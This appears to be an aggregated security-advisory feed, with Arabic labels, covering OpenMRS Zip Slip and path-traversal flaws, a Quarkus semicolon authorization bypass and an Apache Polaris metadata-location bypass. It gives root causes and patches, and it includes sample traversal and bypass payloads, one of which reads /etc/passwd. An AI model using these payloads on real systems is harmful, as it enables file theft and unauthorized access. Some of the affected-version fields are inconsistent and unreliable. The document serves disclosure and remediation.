The `module.allow_web_admin` property only restricts module operations at the Legacy UI layer (`ModuleListController`). The REST API endpoint does not consult this property:

```
Legacy UI: POST /admin/modules/moduleList.form → allowAdmin() check → [BLOCKED]
REST API:  POST /ws/rest/v1/module            → No allowAdmin() check → [ALLOWED]
    ↓
ModuleFactory.loadModule()
    ↓
WebModuleUtil.startModule()  ← Zip Slip here, no allowAdmin check
    ↓
FileOutputStream.write()     ← Arbitrary file write
```

## Remediation

Add `normalize().startsWith()` boundary validation before writing, consistent with the existing pattern in `ModuleUtil.expandJar()`:

```java
File outFile = new File(absPath.toString().replace("/", File.separator));
// ✅ Add this check
if (!outFile.toPath().normalize().startsWith(Paths.get(realPath, "WEB-INF").normalize())) {
    throw new UnsupportedOperationException(
        "Zip entry '" + name + "' would be written outside the allowed directory.");
}
```

Additionally, enforce the `module.allow_web_admin` restriction consistently across all module upload entry points, including the REST API.
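The "why the check fails" reasoning above can be reproduced with a few lines of standalone Java. Both checks are extracted as predicates; the base directory is illustrative, not from a real deployment:

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class ZipSlipCheckDemo {
    // The incomplete check from the advisory: only rejects entry names
    // whose FIRST path element is "..".
    static boolean passesIncompleteCheck(String entryName) {
        return !Paths.get(entryName).startsWith("..");
    }

    // The normalize().startsWith() pattern used elsewhere in the codebase:
    // resolve the entry against the extraction base and verify the
    // normalized result stays inside it.
    static boolean passesBoundaryCheck(Path base, String entryName) {
        return base.resolve(entryName).normalize().startsWith(base.normalize());
    }

    public static void main(String[] args) {
        String evil = "web/module/foo/../../../../evil.jsp";
        Path base = Paths.get("/srv/openmrs/WEB-INF/view/module");
        System.out.println(passesIncompleteCheck(evil));      // true: flawed check is bypassed
        System.out.println(passesBoundaryCheck(base, evil));  // false: correct check rejects it
    }
}
```

The four `../` segments cancel `foo`, `module`, and `web` and then pop one level out of the base directory, so the normalized path lands in `WEB-INF/view/` rather than under `view/module/`.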

الإصدارات المتأثرة

All versions < 0

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

عالية
📦 io.quarkus:quarkus-vertx-http 🏢 quarkus 📌 All versions < 0.23.0, 0.23.1, 0.23.2, 0.24.0, 0.25.0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Incorrect Authorization 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 Quarkus version 3.32.4 is vulnerable to an authorization bypass issue (GHSL-2026-099), in which semicolons (matrix parameters) in HTTP requests can be used to bypass security constraints, potentially allowing unauthorized access to protected resources. Unauthenticated or lower-p...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

Quarkus version 3.32.4 is vulnerable to an authorization bypass issue (GHSL-2026-099), in which semicolons (matrix parameters) in HTTP requests can be used to bypass security constraints, potentially allowing unauthorized access to protected resources. Unauthenticated or lower-privileged users can bypass HTTP path-based authorization policies by appending a semicolon (`;`) and arbitrary text to the request URL.

The vulnerability arises from a path-normalization inconsistency: Quarkus's [security layer](https://quarkus.io/guides/security-authorize-web-endpoints-reference) performs authorization checks on the raw URL path (which preserves matrix parameters), whereas RESTEasy Reactive's routing layer strips matrix parameters before matching endpoints. This allows requests like `/api/admin;anything` to bypass policies protecting `/api/admin` while still routing to the protected endpoint.

### Impact

This issue may lead to Authentication/Authorization bypasses.

### Credits

This issue was discovered with the [GitHub Security Lab Taskflow Agent](https://github.com/GitHubSecurityLab/seclab-taskflow-agent) and manually verified by GHSL team members [@p- (Peter Stöckli)](https://github.com/p-) and [@m-y-mo (Man Yue Mo)](https://github.com/m-y-mo).
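The inconsistency can be modeled in a few lines of standalone Java. This is a deliberately simplified sketch: `policyMatches` and `routedPath` are hypothetical stand-ins for the two layers, not Quarkus APIs.

```java
public class MatrixParamMismatchDemo {
    // Stand-in for the security layer: matches a policy for /api/admin
    // against the RAW path, which still carries matrix parameters.
    static boolean policyMatches(String rawPath) {
        return rawPath.equals("/api/admin") || rawPath.startsWith("/api/admin/");
    }

    // Stand-in for the routing layer: strips matrix parameters
    // (everything after ';' in each segment) before endpoint matching.
    static String routedPath(String rawPath) {
        StringBuilder sb = new StringBuilder();
        for (String seg : rawPath.split("/", -1)) {
            int semi = seg.indexOf(';');
            sb.append(semi >= 0 ? seg.substring(0, semi) : seg).append('/');
        }
        sb.setLength(sb.length() - 1);
        return sb.toString();
    }

    public static void main(String[] args) {
        String raw = "/api/admin;anything";
        System.out.println(policyMatches(raw)); // false: the policy never fires
        System.out.println(routedPath(raw));    // /api/admin: the protected endpoint is still hit
    }
}
```

The bypass exists precisely because two layers disagree on what "the path" is; the durable fix is to run both authorization and routing against the same normalized form.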

الإصدارات المتأثرة

All versions < 0.23.0, 0.23.1, 0.23.2, 0.24.0, 0.25.0

نوع الثغرة

CWE-863 — Incorrect Authorization

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

عالية
📦 org.openmrs.web:openmrs-web 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد ☕ مكتبة Java Maven ⚡ Path Traversal 🎯 عن بعد ⚪ لم تُستغل
💬 ## Affected Versions version ≤ 2.7.8 (latest version at time of disclosure) https://github.com/openmrs/openmrs-core ## Impact The `/openmrs/moduleResources/{moduleid}` endpoint in OpenMRS Core is vulnerable to a path traversal attack. The `ModuleResourcesServlet` does not pro...
📅 2026-05-04 OSV/Maven 🔗 التفاصيل

الوصف الكامل

## Affected Versions

version ≤ 2.7.8 (latest version at time of disclosure)

https://github.com/openmrs/openmrs-core

## Impact

The `/openmrs/moduleResources/{moduleid}` endpoint in OpenMRS Core is vulnerable to a path traversal attack. The `ModuleResourcesServlet` does not properly validate user-supplied path input, allowing an attacker to traverse directories and read arbitrary files from the server filesystem (e.g., `/etc/passwd`, application configuration files containing database credentials).

This endpoint serves static module resources (CSS, JS, images) and is **not protected by authentication filters**, as these resources are required for rendering the login page. Therefore, this vulnerability can be exploited by an **unauthenticated** attacker.

> **Note:** Successful exploitation requires the target deployment to run on **Apache Tomcat < 8.5.31**, where the `..;` path parameter bypass is not mitigated by the container. Deployments on Tomcat ≥ 8.5.31 / ≥ 9.0.10 are protected at the container level, though the underlying code defect remains.

## Steps to Reproduce

1. Identify a valid installed module ID on the target OpenMRS instance (e.g., `legacyui`).

2. Send the following HTTP request:

   <img width="1038" height="798" alt="image" src="https://github.com/user-attachments/assets/7d10ee0e-4d81-4c01-bc84-a1bf5715f170" />

3. The server responds with HTTP 200 and the contents of `/etc/passwd`:

   <img width="1028" height="843" alt="image" src="https://github.com/user-attachments/assets/b6806a7e-ff52-4f51-8f7f-7ea4e9754d10" />

## Root Cause Analysis

The vulnerability exists in `ModuleResourcesServlet.java` (`web/src/main/java/org/openmrs/module/web/ModuleResourcesServlet.java`). The `getFile()` method constructs a filesystem path from user-controlled input without performing path boundary validation:

```java
protected File getFile(HttpServletRequest request) {
    // Step 1: User-controlled path input
    String path = request.getPathInfo();

    // Step 2: Extract module from path prefix
    Module module = ModuleUtil.getModuleForPath(path);
    if (module == null) {
        return null;
    }

    // Step 3: Strip module ID prefix — no traversal check
    String relativePath = ModuleUtil.getPathForResource(module, path);

    // Step 4: Concatenate into absolute path
    String realPath = getServletContext().getRealPath("") + MODULE_PATH
            + module.getModuleIdAsPath() + "/resources"
            + relativePath; // contains "/../../../etc/passwd"
    realPath = realPath.replace("/", File.separator);

    // Step 5: No normalize().startsWith() boundary check
    File f = new File(realPath);
    if (!f.exists()) {
        return null;
    }
    return f; // Arbitrary file returned to client
}
```

The helper method `ModuleUtil.getPathForResource()` only strips the module ID prefix and performs no sanitization:

```java
public static String getPathForResource(Module module, String path) {
    if (path.startsWith("/")) {
        path = path.substring(1);
    }
    // Returns unsanitized remainder, e.g., "/../../../../../../etc/passwd"
    return path.substring(module.getModuleIdAsPath().length());
}
```

The resulting path resolves as:

```
{webapp}/WEB-INF/view/module/legacyui/resources/../../../../../../etc/passwd
→ /etc/passwd
```

Notably, the same codebase already implements correct path traversal protection in `StartupFilter.java`:

```java
// StartupFilter.java — correct protection
fullFilePath = fullFilePath.resolve(httpRequest.getPathInfo());
if (!(fullFilePath.normalize().startsWith(filePath))) {
    log.warn("Detected attempted directory traversal...");
    return; // Request rejected
}
```

This check is absent from `ModuleResourcesServlet`.

## Remediation

Add a path boundary check after constructing `realPath` and before returning the `File` object. The fix should use `normalize()` + `startsWith()` to ensure the resolved path stays within the allowed module resources directory:

```java
File f = new File(realPath);
Path allowedBase = Paths.get(getServletContext().getRealPath(""), "WEB-INF", "view", "module");
if (!f.toPath().normalize().startsWith(allowedBase.normalize())) {
    log.warn("Blocked path traversal attempt: {}", request.getPathInfo());
    return null;
}
```

This is consistent with the existing pattern used in `StartupFilter.java` and `TestInstallUtil.java` within the same project.
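The path resolution shown in the advisory can be verified with standalone Java: normalizing the concatenated servlet path collapses the six `../` segments straight to `/etc/passwd`, and the missing boundary predicate catches it. The webapp base path here is illustrative:

```java
import java.nio.file.Paths;

public class ModuleResourcePathDemo {
    // Normalize the concatenated servlet path the same way the filesystem
    // would resolve it.
    static String resolved(String realPath) {
        return Paths.get(realPath).normalize().toString();
    }

    // The missing boundary check, sketched as a standalone predicate:
    // the normalized path must remain under the module directory.
    static boolean insideBase(String realPath, String base) {
        return Paths.get(realPath).normalize().startsWith(Paths.get(base).normalize());
    }

    public static void main(String[] args) {
        String base = "/webapp/WEB-INF/view/module";
        String real = base + "/legacyui/resources/../../../../../../etc/passwd";
        System.out.println(resolved(real));         // /etc/passwd
        System.out.println(insideBase(real, base)); // false: would be rejected
    }
}
```

A legitimate request such as `legacyui/resources/css/style.css` normalizes to a path under the base and passes the same predicate, so the check blocks only the traversal case.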

الإصدارات المتأثرة

All versions < 0

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

9.9/10 حرجة
📦 org.apache.polaris:polaris-runtime-service 📌 1.0.0-incubating, 1.0.1-incubating, 1.1.0-incubating, 1.2.0-incubating, 1.3.0-incubating 🗄️ سيرفر ☕ مكتبة Java Maven ⚡ Input Validation 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 In Apache Iceberg, the table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files. For a table alr...
📅 2026-05-04 NVD 🔗 التفاصيل

الوصف الكامل

In Apache Iceberg, the table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files.

For a table already registered in a Polaris-managed catalog, changing only that property through an `ALTER TABLE`-style settings change (not a row-level `INSERT`, `SELECT`, `UPDATE`, or `DELETE`) bypasses the commit-time branch that is supposed to revalidate storage locations.

The full persisted / credential-vending variant requires the affected catalog to have `polaris.config.allow.unstructured.table.location=true`, with `allowedLocations` broad enough to include the attacker-chosen target. `allowedLocations` is the admin-configured allowlist of storage paths that the catalog is allowed to use. Public project materials suggest that this flag is a real supported compatibility / layout mode, not just a contrived lab-only prerequisite.

In that configuration, a user who can change table settings can cause Apache Polaris itself to write new table metadata to an attacker-chosen reachable storage location before the intended location-validation branch runs. If the later concrete-path validation also accepts that location, Polaris persists the resulting metadata path into stored table state. Later table-load and credential APIs can then return temporary cloud-storage credentials for the same location without revalidating it. In plain terms, Polaris can later hand out temporary storage access for the same attacker-chosen area.

That attacker-chosen area does not need to be limited to the poisoned table's own files. If it is a broader storage prefix, another table's prefix, or, depending on configuration or provider behavior, even a bucket/container root, the resulting disclosure or corruption scope can extend to any data and metadata Polaris can reach there.
The practical consequences are therefore similar to the staged-create credential-vending issue already discussed: data and metadata reachable in that storage scope can be exposed and, if write-capable credentials are later issued, modified, corrupted, or removed.

Even before that later credential step, Polaris itself performs the metadata write to the unchecked location. So the core issue is not only later credential vending: the primary defect is that Polaris skips its intended location checks before performing a security-sensitive metadata write when only `write.metadata.path` changes.

When `polaris.config.allow.unstructured.table.location=false`, current code review suggests the later `updateTableLike(...)` validation usually rejects out-of-tree metadata locations before the unsafe path is persisted. That may reduce the persisted / credential-vending variant, but it does not prevent the underlying defect: Polaris still skips the intended pre-write location check when only `write.metadata.path` changes.
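The kind of pre-write revalidation the advisory says is skipped can be sketched as a prefix check of the proposed `write.metadata.path` against the catalog's `allowedLocations`, run on every metadata commit rather than only on row-level operations. This is a hedged illustration, not Polaris code: the method name and bucket paths below are hypothetical.

```java
import java.util.List;

public class MetadataLocationCheckDemo {
    // Hypothetical sketch: accept a proposed metadata location only if it
    // falls under one of the catalog's admin-configured allowedLocations
    // prefixes. A real implementation would also normalize the URI first.
    static boolean locationAllowed(List<String> allowedLocations, String metadataPath) {
        return allowedLocations.stream().anyMatch(metadataPath::startsWith);
    }

    public static void main(String[] args) {
        List<String> allowed = List.of("s3://analytics-bucket/warehouse/");
        System.out.println(locationAllowed(allowed,
                "s3://analytics-bucket/warehouse/db/tbl/metadata/")); // true
        System.out.println(locationAllowed(allowed,
                "s3://victim-bucket/"));                              // false
    }
}
```

The advisory's point is precisely that this check must run before the metadata write on every path that can change `write.metadata.path`, not only on the row-level commit branch.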

الإصدارات المتأثرة

1.0.0-incubating, 1.0.1-incubating, 1.1.0-incubating, 1.2.0-incubating, 1.3.0-incubating

نوع الثغرة

CWE-20 — Input Validation

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H